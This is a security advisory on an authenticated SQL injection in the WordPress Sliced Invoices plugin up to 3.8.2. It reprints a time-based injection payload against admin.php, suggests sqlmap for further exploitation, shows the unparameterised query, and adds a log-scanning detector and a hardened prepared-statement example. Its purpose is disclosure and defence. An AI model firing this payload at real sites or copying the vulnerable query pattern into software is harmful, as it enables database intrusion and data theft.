Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection
The Wordpress Sliced Invoices plugin, version 3.8.2 or earlier, is affected by an authenticated SQL injection vulnerability. Note that this vulnerability is highly similar to Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS, since both are reachable through the same GET parameter.
Initial submission of the vulnerability
```text
# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3

1. Description:
The Wordpress Sliced Invoices plugin, version 3.8.2 or earlier, is affected by an authenticated SQL injection vulnerability.

2. Proof of Concept:
Authenticated SQL Injection:
- Using a Wordpress user, access <your target>/wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
- The response is returned after 20 seconds, proving that the injection succeeded.
- Sqlmap can be used to further exploit the vulnerability.
```
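The proof of concept above leaves a recognisable trace in the web server access log: a request for `admin.php` with `action=duplicate_quote_invoice` and a `post` value that is not a plain numeric post ID. The following PHP script is an added example (not part of the advisory or the plugin) that flags such entries; the log lines it scans are constructed samples in Apache combined format, not real traffic.

```php
<?php
// Added example: flag access-log entries where the duplicate_quote_invoice
// action is requested with a 'post' value that is not a plain post ID.
// The log lines below are constructed samples, not captured traffic.

$sample_log = <<<'LOG'
10.0.0.5 - - [22/Oct/2019:10:15:01 +0000] "GET /wp-admin/admin.php?action=duplicate_quote_invoice&post=8 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - - [22/Oct/2019:10:16:44 +0000] "GET /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Oct/2019:10:17:02 +0000] "GET /wp-admin/edit.php?post_type=sliced_invoice HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
LOG;

/**
 * Return one record per suspicious request: client IP, timestamp and the
 * decoded 'post' value. A legitimate duplication request carries only digits.
 */
function suspicious_requests(string $log): array {
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        // Extract client IP, timestamp and the request target from the quoted request field.
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*"/', $line, $m)) {
            continue; // not a combined-format line we understand
        }
        [, $ip, $ts, $target] = $m;
        $parts = parse_url($target);
        if (!isset($parts['path'], $parts['query']) || !preg_match('#/wp-admin/admin\.php$#', $parts['path'])) {
            continue;
        }
        parse_str($parts['query'], $q); // parse_str also URL-decodes %20 and friends
        if (($q['action'] ?? '') !== 'duplicate_quote_invoice') {
            continue;
        }
        $post = (string) ($q['post'] ?? '');
        // ctype_digit('') is false, so a missing post value is flagged as well.
        if (!ctype_digit($post)) {
            $hits[] = ['ip' => $ip, 'time' => $ts, 'post' => $post];
        }
    }
    return $hits;
}

foreach (suspicious_requests($sample_log) as $hit) {
    printf("%s %s post=%s\n", $hit['time'], $hit['ip'], $hit['post']);
}
```

Run it with `php detect.php`; only the second sample line is reported. The check is deliberately strict (anything other than digits is flagged) because the plugin's legitimate use of the parameter is a numeric post ID, so false positives are cheap to triage.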
Detailed analysis of the vulnerability
Under wp-content/plugins/sliced-invoices/admin/class-sliced-admin.php, at line number 2202, we can observe the use of a non-parameterized query using $wpdb->get_results() with user-supplied data:

```php
// Line 2202: $post_id is interpolated directly into the SQL string (vulnerable as shipped)
$post_meta_infos = $wpdb->get_results("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");
```
The $post_id variable is assigned on line 2154 as:

```php
/*
 * get the original post id
 */
$post_id = (isset($_GET['post']) ? $_GET['post'] : $_POST['post']);
```
This vulnerability could be easily exploited by accessing example.com/wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20 where example.com is your target. To retrieve more data you can use the sqlmap tool over the affected target URL.
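For contrast, here is the vulnerable pattern from the two snippets above placed beside a hardened version that validates the parameter as a positive integer and binds it with a `%d` placeholder through `$wpdb->prepare()`. This is an added example, not the vendor's patch and not the plugin's code; `FakeWpdb` is a stand-in for WordPress's global `$wpdb` so the file runs from the PHP CLI without a WordPress install (in a real plugin you would use `$wpdb` itself, and `absint()` can replace the manual integer check).

```php
<?php
// Added example: vulnerable vs. hardened handling of the 'post' parameter.
// FakeWpdb only records the final SQL string; it does not talk to a database.
class FakeWpdb {
    public $postmeta = 'wp_postmeta';
    public $last_query = '';

    // Stand-in for wpdb::prepare(): %d is cast to int, %s is quoted and escaped.
    public function prepare(string $query, ...$args): string {
        $i = 0;
        return preg_replace_callback('/%[ds]/', function ($m) use (&$i, $args) {
            $arg = $args[$i++] ?? '';
            return $m[0] === '%d' ? (string) (int) $arg : "'" . addslashes((string) $arg) . "'";
        }, $query);
    }

    public function get_results(string $sql): array {
        $this->last_query = $sql;
        return [];
    }
}

// Vulnerable: the raw request value is concatenated into the query,
// exactly as on lines 2154 and 2202 of the plugin.
function duplicate_vulnerable(FakeWpdb $wpdb, array $request): string {
    $post_id = isset($request['post']) ? $request['post'] : '';
    $wpdb->get_results("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");
    return $wpdb->last_query;
}

// Hardened: accept only a positive integer, then bind it with %d so the
// value can never change the structure of the statement.
function duplicate_hardened(FakeWpdb $wpdb, array $request): ?string {
    $raw = $request['post'] ?? null;
    if ($raw === null || !ctype_digit((string) $raw) || (int) $raw < 1) {
        return null; // reject anything that is not a plain post ID
    }
    $post_id = (int) $raw;
    $sql = $wpdb->prepare(
        "SELECT meta_key, meta_value FROM {$wpdb->postmeta} WHERE post_id = %d",
        $post_id
    );
    $wpdb->get_results($sql);
    return $wpdb->last_query;
}

$wpdb = new FakeWpdb();
// Constructed sample: the decoded request shape from the advisory's proof of concept.
$attack = ['post' => '8 and (select*from(select(sleep(20)))a)-- '];
$normal = ['post' => '8'];

echo "vulnerable: ", duplicate_vulnerable($wpdb, $attack), "\n";
echo "hardened  : ", var_export(duplicate_hardened($wpdb, $attack), true), "\n"; // NULL, request rejected
echo "hardened  : ", duplicate_hardened($wpdb, $normal), "\n";                    // post_id = 8
```

The first line of output shows the injected condition sitting inside the WHERE clause; the hardened handler rejects that input outright and, for a valid ID, produces a statement whose only variable part is an integer. Validating the type before the query and using a placeholder are complementary: the placeholder protects the SQL, the validation gives a clean error path and keeps the duplicate action from ever running on garbage.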
How to fix
Update to the latest available version of the Sliced Invoices plugin.
Public appearances
- Exploit Database: https://www.exploit-db.com/exploits/47540
- Packet Storm: https://packetstormsecurity.com/files/154953/WordPress-Sliced-Invoices-3.8.2-SQL-Injection.html